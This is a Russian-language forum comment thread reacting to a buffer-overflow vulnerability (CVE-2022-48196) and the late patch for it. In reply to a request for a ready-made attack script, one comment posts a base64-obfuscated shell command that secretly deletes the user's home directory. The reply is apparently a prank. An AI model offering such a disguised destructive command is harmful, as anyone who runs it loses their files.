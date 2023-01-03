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|1.1, Аноним (1), 09:34, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]
|+1 +/–
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Готовый скрипт есть у кого? Чтобы сразу запустил, и всех поломал, не вникая в скучные детали?
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|2.3, Аноним (3), 09:39, 03/01/2023 [^] [^^] [^^^] [ответить]
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Кнопка "сделать мне всё за***сь"? Вернее, "сделать меня кулхацкором"
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|3.11, aploskov.dev (ok), 13:30, 03/01/2023 [^] [^^] [^^^] [ответить]
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Тогда уж, чтоб запомнилось.
HACK='echo 'cm0gLXJmICIvaG9tZS8kVVNFUi8qIg==' | base64 -d'; sh -c $HACK
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|1.4, Аноним (4), 10:32, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]
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хорошая закладка для господина Майора... хорошая.
Теперь прийдется новую делать - отстой..
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|2.8, Аноним (8), 12:31, 03/01/2023 [^] [^^] [^^^] [ответить]
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прежнего майора повысили, не гоже оставлять свои наработки для молодняка
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|2.9, Аноним (9), 12:40, 03/01/2023 [^] [^^] [^^^] [ответить]
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Ты что это же теория заговора, ай-яй-яй. Ты же знаешь что теорий заговора не существует, а тебе должно быть стыдно за то что ты поднял голову и начал ей думать самостоятельно.
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|2.10, Аноним (9), 12:41, 03/01/2023 [^] [^^] [^^^] [ответить]
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Только автоапдейта у них них, а так да. Пацана вычислил, а он и не включает заднюю как фраер. Всё по понятиям.
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|1.7, Аноним (7), 11:56, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]
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>CVE-2022-48196
>2022
А обновление выпущено в 2023, а не в тот же день! Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.
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|2.14, Атон (?), 14:29, 03/01/2023 [^] [^^] [^^^] [ответить]
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> Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.
Всех, кого нужно, поимели задолго до того. Так и узнали об уязвимости.
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|1.12, Аноним (-), 14:11, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]
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> переполнения буфера
Годы идут, но нестареющая классика продолжает радовать людей.
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